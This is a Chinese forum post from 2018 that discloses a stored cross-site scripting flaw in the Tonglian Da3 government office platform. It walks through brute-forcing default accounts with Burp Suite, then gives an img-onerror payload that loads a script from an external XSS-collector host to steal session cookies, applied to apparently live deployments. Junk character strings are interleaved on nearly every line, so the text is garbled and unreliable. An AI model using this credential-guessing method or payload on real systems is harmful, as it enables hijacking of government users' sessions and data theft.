( T b5 N# v% q" c( i
! R. _; z4 ^1 C) G) _- |* h/ j- q 同联Da3协同办公平台后台通用储存型xss漏洞7 P! s, n+ R5 n, S `
# r5 Z. A/ ^9 `& d$ i( U
+ x5 X/ J( X( U; j 平台简介:
; G- Y8 z5 u9 Y0 \) J, ~. d
6 s9 U9 n3 i, Z" w" r3 [ * |) q0 y4 z& V
# n ^8 k4 J1 |4 H2 r
; s- y8 D x+ z
) s& R9 F1 `+ ^+ |
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
' i2 m3 O' O6 {) l- {( ?9 z/ }0 u
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
! A& p% K( _& \, e" k
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
' C! {3 l& d5 U0 X5 I. a. r2 `
) H4 \ p( {/ J9 Y! V2 h
' M4 j# I5 C) d
( C& W+ o; ~ T- M( z! _& S1 c. N
: o. a- { H- w1 G. o1 V6 G5 q
: U2 `. C4 Z( o- h3 |7 m
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
& h1 n9 D" G$ c2 E3 f
; y% U: X; A3 n0 V
5 J& D' j1 d; H2 n' L
: v3 x. d2 T A" Z
0 t; U9 T, g& `( a
& v+ @; k" ?' X, T2 G0 w6 ` http://1.1.1.1:7197/cap-aco/#(案例2-)& a% q' s# q) W# Y4 r
& q( T" r: h8 Z8 x ' x; @; u# ~# z! N- W( s
http://www.XXOO.com (案例1-官网网站)
/ K" j' l0 V* p1 S+ N
- k7 v3 f; H" M( L/ l( N* a# P
$ v" L# w0 v4 D, B% ~
漏洞详情:
$ }4 `$ y6 u" @! ]; t
7 u$ E' u% ]: v# e& e
) j* v: y! u# X& ^- G 案例一、 B( y4 V0 ~; |/ C$ l. w ~' S
+ U& h1 L9 i, [ 0 Y, t" _+ {* ~& m5 H8 G
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
" `. z H: s! ~2 p- A- T4 t) R
3 p: o8 a+ y: G Z; l$ K
0 p# I7 Q# v+ @8 V
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
. `# e4 d# {6 Y+ B6 ]5 h/ U8 ]
$ @7 T1 R5 u0 {( w8 U) }2 ]) Y* ]/ J
4 p' Q+ [8 g8 R+ m' l % B4 ^* Q* e" T5 ?# H
* A/ L& r0 P2 ~
/ W' {/ K9 ?2 V 
/ a) c: s/ ~5 Q4 p$ s! Q) ^
- ~) U/ {+ f# Y( ?! w' k 3 f! E0 y2 I7 J' F
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: " p& {) l# N+ _# o+ F) F) A% W
/ F0 _& ?( c1 r* `8 V! h1 H# j, W Y
( P8 V9 s/ h# `. t U4 m
: k, f1 n" q: r# y8 ^& j
6 k/ y( s$ a8 ?6 U8 Q+ t
( U! m4 d% q/ P( F! R8 K# E! l5 j3 V 
9 p) |4 ?4 G( \! `" J. f. t* s+ h
; e9 u5 I' L3 k
- X3 A# e. n) @/ L% n4 Q2 \
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 & X; U2 |$ c+ v5 D) S2 u
# [6 [) |9 R' Q; N5 a# ^4 S
- y* e% i) m3 P0 \7 L( ` : p& x& O @+ ?9 S
% U+ ^% |& [1 S L5 x. T
K7 l4 h9 f- I( x! [) `" X2 o& W' c <img src=x7 r. j/ h, j) h; V1 S. |
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 5 i8 D8 m9 [5 A9 @; U6 e+ p
3 V8 G( H H% C. s4 ~4 C6 H5 W @
8 b$ V/ _$ L+ ~ v% F 
( R. Q/ _; G' r
5 a& b2 E- ]8 u m; Z1 i. V/ l+ d
( A8 t, }% r2 s$ ^4 y
然后发送,接收cookie如图: . H5 _8 |2 v9 e7 E
6 l; L' v+ u. c5 p+ N
* b" N) r+ b) n& Y) j' {% Z
0 M* P* C' f/ c5 S) F* l9 G+ Z
+ r& h u# L; ~( t4 `- s- Q
" R8 E8 Z# w3 \* L4 _! ~2 f5 G( D
6 u# C! }! d% |, p- g& K% J
4 n% n" _' u1 d0 V2 ` 3 E7 B0 O' k5 x# t3 J, C
9 x. f. q0 ?" h- K2 ?. v2 A
4 r: Z0 A$ ~7 d6 J- H1 ?
- r) U& M) N# Z. n' i. v$ F
- c2 \; h( c/ T, G. v1 b; \7 `# y& P
' g4 U; C- u& @" g" _* t3 r1 N P1 w
/ |; V9 S6 h- H5 w5 L0 ^ 
: M2 z" l' o2 |# J$ n5 Y
0 d8 N% W* N2 M7 ~4 c
c; P' w# ~) C; ]; f* B" D 
, Q1 k, z- b& v2 g$ v( v8 Q- E
# k2 _ ?) h( L5 X! }: ]( S
/ C+ C: m. ~6 T* u + B2 I0 _. d. ]1 M; X. G
7 k& B% y6 |, u; R+ }! P
, L! V! i" n" L, \' k: B7 v- G
案例2、 0 d# B9 l, ]4 e; l, {
! C. Y5 y+ _- U* A8 c
' {5 d4 W5 A' T9 {2 n 前面步骤都一样,下面看效果图:
) ~& E( ?" T* I8 V+ U" x _' a
[$ E) @- e' T9 b& V
5 \" V8 G, W3 {5 S 
4 R+ l9 Q+ g+ N$ d: v: m2 C
7 n$ b+ E4 o/ @ D/ n8 }
# W$ d3 d2 D9 C
; ^+ `9 R' K f' \
, N: o+ m2 S$ T* R
5 f% b! N' P/ b3 L
) p; n" X2 g3 j
2 P0 V% d' ^; H4 \( c" w( K
2 E* `! p1 `1 C# r- }( ?6 A0 T
% R9 Z3 N. v7 y
+ G9 x9 J( H4 Q+ s; o$ L+ g
, g8 r$ V- T Y9 P* Z
4 g9 P$ G+ C: R8 }
2 f. R! T1 J3 T3 A' H9 v
9 o' b, L8 ?; r2 d ; ]4 X" G9 G. a+ L
8 \* I( w2 ~# ]% C/ u
) m4 ?! Y( |$ p2 M" ~* |
- F! M6 s: [) l) S/ b: G) b* z% B
: D$ Z5 f6 q: g( w 0 `/ y/ \4 @+ f6 w9 C
. q+ B9 L4 b$ Q [
& [+ _! W! Y% C$ Q7 H
/ f) X4 U) p3 X
8 d( G- l. o$ {3 W* K
4 B/ c3 p+ W4 E/ H \' c+ \0 D8 d" F
发表于 2018-10-20 20:14:15
收藏
支持
反对